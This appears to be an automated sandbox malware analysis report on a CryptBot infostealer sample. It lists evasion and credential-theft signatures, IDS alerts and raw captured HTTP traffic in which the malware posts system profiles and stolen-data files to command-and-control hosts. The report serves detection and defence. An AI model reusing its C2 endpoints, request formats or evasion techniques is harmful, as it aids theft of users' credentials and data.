Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565525
MD5: 245042b39f7fe432daf72c046d5000d3
SHA1: f3ae48a9bd52536b83b76ed988558e5681009e96
SHA256: 1c4b207bb8d58a6068ed2be0eb27653a7245dfe8fee548c4720d14510453c27c
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_000515B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_000515B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1714B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6C1714B0
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_6bc3138c-a
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_000581E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C1EAEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C1EAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C1EAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C190860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C19A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C19A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C19A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C24F960h 8_2_6C18EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C194453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C2184A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C19C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C19A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C19A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C19A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C19E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C19E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6C210730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C190740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C1EC040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C1EC1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6C1CA1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C190260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C24D014h] 8_2_6C244360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C1EBD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1E7D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C1E3840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6C19D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C1C9B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C1ABBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C1ABBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C1EB4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C19D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6C1E9600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6C19D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C24DFF4h 8_2_6C1E3690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6C19D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C213140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C18B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C19D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C207350
Source: chrome.exe Memory has grown: Private usage: 1MB later: 26MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49751 -> 141.8.197.146:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 141.8.197.146:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49740 -> 141.8.197.146:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /RrlNvinfLqYZQoxgChZr1732768478 HTTP/1.1Host: home.fvtekx5pt.topAccept: */*Content-Type: application/jsonContent-Length: 495413Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 32 39 33 39 32 30 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global traffic HTTP traffic detected: GET /RrlNvinfLqYZQoxgChZr1732768478?argument=H4fk2a9gwuhwz7Ag1732939204 HTTP/1.1Host: home.fvtekx5pt.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekx5pt.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------etjbp9eatohwlV63bzxiY0Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 74 6a 62 70 39 65 61 74 6f 68 77 6c 56 36 33 62 7a 78 69 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 69 62 61 74 6f 66 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a dd 56 a8 60 99 50 e8 04 c1 4a 68 77 05 4f c8 06 b3 21 cb b7 da 1a 41 8c 68 d2 a1 e3 bd ad e0 04 48 31 da f0 8c f0 ed c0 8b 91 55 2f 18 81 96 5d b0 03 36 ab d6 65 55 9a 33 42 e3 9a f6 ac ec cc 33 0a 77 a7 f4 74 23 ca 8d 53 9e f5 e8 73 96 37 9f 94 40 ae 33 6b 63 35 5b 6a 77 34 2c 1a 06 8a c4 a8 cd be be b3 36 3a 02 22 76 0d a5 78 8d 32 ec 5c 95 4c a8 9f fc c1 71 24 35 9d 45 e5 d9 8e 2e d1 05 3a 30 e5 5e 73 b8 b1 a6 e6 22 44 d1 db 71 38 9b 8b ed 65 1b 8a d5 37 04 07 fc 0e f5 27 b9 61 f9 f2 2c 54 79 3e 25 0b cb 6e 30 bf a8 7d 9c 92 d0 69 79 c0 9c 05 e8 f2 44 23 6f 29 02 96 f0 c2 23 bd 4f 10 ae 40 23 11 be a6 d4 58 f3 c2 88 ec 78 8a a7 39 15 32 36 ec 05 9b 02 18 e9 db e1 0c 6a 6d 3c 2e 9d 1d de 82 36 ff 80 98 dd f0 22 0b e8 f8 f2 81 53 59 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 74 6a 62 70 39 65 61 74 6f 68 77 6c 56 36 33 62 7a 78 69 59 30 2d 2d 0d 0a Data Ascii: --------------------------etjbp9eatohwlV63bzxiY0Content-Disposition: form-data; name="file"; filename="Cibatofa.bin"Content-Type: application/octet-streamV`PJhwO!AhH1U/]6eU3B3wt#Ss7@3kc5[jw4,6:"vx2\Lq$5E.:0^s"Dq8e7'a,Ty>%n0}iyD#o)#O@#Xx926jm<.6"SY--------------------------etjbp9eatohwlV63bzxiY0--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekx5pt.topAccept: */*Content-Length: 75910Content-Type: multipart/form-data; boundary=------------------------3fgyOkuD7olZ7iE9aKaFXIData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 66 67 79 4f 6b 75 44 37 6f 6c 5a 37 69 45 39 61 4b 61 46 58 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 61 66 61 6a 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2b e4 23 00 b8 06 92 a2 6f ae 50 08 05 a6 59 8e 90 60 86 c3 c7 92 8b 95 01 57 ad e5 26 a4 d1 98 2a ca 59 55 8e 38 50 a9 a5 20 46 cd d0 2f 60 37 87 74 4f 7d 6f 36 91 d1 e2 a2 4b b6 9b 1b 9e 67 fa b1 a5 d3 f3 9c 6c 35 08 3e ba d2 3d 4f bc 07 b2 7b 1c 39 9f af 3c 18 3c 78 69 f7 04 88 23 66 5b db a9 23 ae ac 93 de aa 79 fb 15 ca 63 29 eb 18 a8 0f df ae e5 92 43 39 70 66 19 4e 9f fb f2 51 31 0e 72 ee f1 98 17 b6 9b ae 86 b6 03 ac fb c1 18 8c 54 13 e1 06 9b 8f da ef ed 1d a1 78 ab 49 21 64 f7 93 05 31 ad f0 69 d7 18 13 45 b7 09 3e 99 75 d8 6c ff bf 9e 3b c1 01 15 d9 d9 97 75 96 e1 ba 19 86 8d c8 06 a7 3e ae bf 01 89 8d a9 49 6b 7d 30 9d fc 4c 22 6a 5f 6a d1 19 f0 11 38 fd c2 6b 20 ef 77 b1 b9 64 3d 7c a1 4f 76 1d c2 6b 28 72 23 ae 74 8b 2e a4 dd ab 44 25 24 d7 7e 29 af 41 94 c8 0b 93 7d 4a 82 3e d0 c3 df f4 4a 84 0a 92 e1 70 a6 3f 9c b7 19 99 52 b4 27 fa e2 e1 d2 36 cd ad 5e fa cf a9 2b db 29 70 de c2 54 e4 21 16 de 4c 77 3d fc d8 e6 98 29 2d 53 c5 ff b2 e8 2e 39 58 a8 20 e2 e7 45 da aa 77 ca 6e 5d de 79 d8 5d aa 71 ff fb 72 01 ef ee fe 79 58 1b 43 64 dd 61 8b 6a d7 b1 4a 67 00 72 21 6d 4e 08 5b 3c 91 b0 58 6c 4e e9 5b 94 ce da 05 01 ad 7b 8b 7a dc b2 1e 30 de 1e fb 2d b0 8e 7d 5d 15 0b ab 17 49 a0 af 29 f2 18 0c 20 6c 88 44 14 ed e6 87 bf 76 d4 69 03 97 7b 45 29 42 4e 91 c1 f8 82 f5 21 60 1b b9 a2 14 99 e3 22 29 2b f7 57 b6 de 3c b0 f8 2e a3 4d f8 ad 51 f6 71 47 7b 59 9c 6b 0a d3 91 ca ac 11 22 25 68 60 0d ac c3 33 05 43 24 5d 05 e9 94 ca 01 53 6e 73 ea e8 39 c0 e7 6c 26 e3 cd 30 42 de 31 9d 47 bb c5 16 78 40 aa 5d 52 74 3d 16 31 8a 53 58 bc df d4 b6 f8 f7 04 49 53 f0 c9 be 38 44 eb b2 83 7d 93 a2 65 36 00 39 fa 62 52 95 4f d2 65 44 4f e9 58 b6 1c 81 6e af ab fc 02 aa 2d c9 1c 5b e1 a9 8f d0 9e bc b8 e7 e5 37 79 e7 02 0a 8a dc 12 f5 f9 f9 df 2e ea 16 f5 36 5b 57 80 5d ac e2 6a 4e c2 cc 90 81 59 fb e1 04 bc f1 fb 65 8f ab f5 18 3c fb eb 47 c1 bb 9f be a6 f2 49 2c 2e c6 83 84 df ed 34 82 7f 85 91 ca fb 14 68 ad f4 50 93 07 e9 14 56 97 0b ef 19 0d 7e 3d 99 f1 40 f7 b7 d3 47 a5 b0 ad cc 62 00 34 03 74 ef f3 64 2a 80 3a 14 dd 74 b7 4e 76 56 1a b1 c3 db e5 9a 19 b0 73 3e 25 75 5c 3e e4 47 fd b5 4c d7 25 32 69 f1 5e d4 e5 eb 5a 27 90 1f 75 8d 99 47 6c e3 16 b2 55 3b 03 ae f7 ee 00 02 a2 ae f3 a1 f1 3d 8a 29 fe 2d 95 2b 23 25 d8 c8 14 76 0f ce 11 e0 c5 fa ee 7c 3e 80 b3 ed f4 02 27 80 d4 b9 6b f3 87 15
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekx5pt.topAccept: */*Content-Length: 30025Content-Type: multipart/form-data; boundary=------------------------blCPDPFfuxHDz4bKvMP4bYData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 6c 43 50 44 50 46 66 75 78 48 44 7a 34 62 4b 76 4d 50 34 62 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 75 79 65 6e 75 64 69 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 65 6e 5e 5d 2d bb e9 ff c9 d4 db 39 13 1d 83 49 42 31 65 9e ac ed 6e 8b d9 f1 c8 37 c1 4c ae 18 01 9c a4 89 fe fd ed cf 31 09 1f a4 6c 1b 36 32 a3 b1 9d c0 5f d4 e4 5f c2 23 1f db 46 b6 9d c3 99 14 4e f0 0d 67 10 56 ed 67 19 2b 65 11 50 fb 6a 4b 41 51 c0 22 3a 01 43 3d 1a dc 6e 5d 23 22 d9 c4 7c cb 4f a1 4d b5 36 c0 a7 ab 6f 29 b7 39 5c 45 6f 15 3e b8 ed 38 f4 0e d6 72 f6 fb f0 fb 0f 9b 59 bc 24 fa d2 fe a6 1c b8 00 24 d7 48 76 ed 09 d8 4a 51 14 37 2a 4b 32 3b 75 c9 a6 79 50 6a dc 2e a1 9e 6e 36 33 04 aa a6 e3 1d 14 57 5e a2 5c 91 91 0c f6 13 e9 99 31 57 d3 e9 42 0b c6 7d 39 7b 06 79 eb 43 85 62 f4 44 16 81 f2 09 d2 22 58 21 c7 de d7 50 6c 3c 71 4c 2f 88 8e 80 08 49 27 ea 3a 31 cf 44 5a 7e ed 78 c0 aa 04 61 44 7d 57 53 e7 e8 69 e0 e7 d8 c8 21 a9 67 e4 55 f3 d2 fd 5d 35 8a 02 37 a1 a2 7a 29 e2 ab 24 59 1a 53 e9 7d ad b8 16 b0 22 6d ea 80 fa e5 f6 7d d9 53 33 84 63 3a c2 7e 24 04 2b 30 66 7e 8e 12 4d 09 e4 9c 0a 04 70 b1 69 97 b8 fa e1 5b d9 99 d9 cb 6b a3 03 50 be f6 94 1e 86 7d f5 c7 d6 9b a8 7d 04 28 45 43 b0 57 71 8d 3d 18 f5 29 3d 6b 16 b2 80 ef a4 a5 f5 8d a9 85 66 6e c6 1c 34 7a a0 2f c4 e8 88 87 fb dd d7 8d 24 4f 23 01 28 89 c2 a5 ec ce 97 30 00 a3 e4 7a fa 3f eb 18 69 bb 6b fb 83 c8 d9 6b 85 b1 4f b4 7b fa c9 05 6f 22 2c 13 6b 8e 72 a9 71 3a 05 df 41 73 18 57 fd 21 4b c2 d1 ad 21 ba ac 32 dd ec 62 e0 26 e9 72 14 1d 54 64 92 ab 0a 50 43 8b 22 47 a1 a6 8f 51 54 c9 7b 1d 54 80 30 10 97 e4 8e 56 97 3e 53 54 f1 f6 d3 20 1a c8 80 2b 15 67 31 e7 c7 1b 41 b2 07 a0 33 87 e9 46 00 3a cf 29 3c f7 54 cf 8a 93 b8 06 06 ea fc a8 ca ef 3e ad 12 ea a2 07 3d c9 92 25 85 66 31 61 5b 18 f4 a9 a4 ff b9 ef c3 06 46 6d 3e 87 d6 90 b7 b7 3a 89 5a 83 a8 a4 99 20 36 f4 f3 58 2b 9a ba a2 f7 51 cb fc 09 fa 17 c2 9f 30 29 5c 9c b7 b2 82 2f c4 0b 48 24 8b ac 95 3a bc 18 83 8c d8 f6 7c 80 d0 30 78 31 bd 7a 73 6b 74 53 db 36 4d d3 c3 a0 17 ef ab f2 c8 a1 79 d3 ab d9 89 47 c4 5d 5e c6 83 e4 4a ec fa fe 2b 2e ab 85 c5 29 8e 76 68 c2 1a 79 d0 b5 07 0d d7 23 db 04 6f f1 bc f2 17 c4 2c 7d 25 8a 2c 39 ab c8 30 bd 39 4e a4 33 7b 26 57 85 03 9b 04 f3 6a e8 c1 d1 0e fe b4 05 5f 6f 5d 5b b1 bd ca 30 dd 76 fa b7 e6 54 3a b5 d7 08 c1 ec 50 a7 b7 fb e3 6b e5 11 2c 9f f6 b3 83 f6 a3 2f b5 75 9e 0c 4c d8 0e 6e 55 23 0c a1 e6 47 66 58 2f a1 a4 84 96 cf 0e 63 2f 9e 9c df 4f c5 e6 04 9b 7a 0c 34 cb cd 58 5e a3 63 6b 3c 59
Source: global traffic HTTP traffic detected: POST /RrlNvinfLqYZQoxgChZr1732768478 HTTP/1.1Host: home.fvtekx5pt.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 48 34 66 6b 32 61 39 67 77 75 68 77 7a 37 41 67 31 37 33 32 39 33 39 32 30 34 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "H4fk2a9gwuhwz7Ag1732939204", "data": "Done2" }
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 18.208.8.205 18.208.8.205
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 141.8.197.146 141.8.197.146
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /RrlNvinfLqYZQoxgChZr1732768478?argument=H4fk2a9gwuhwz7Ag1732939204 HTTP/1.1Host: home.fvtekx5pt.topAccept: */*
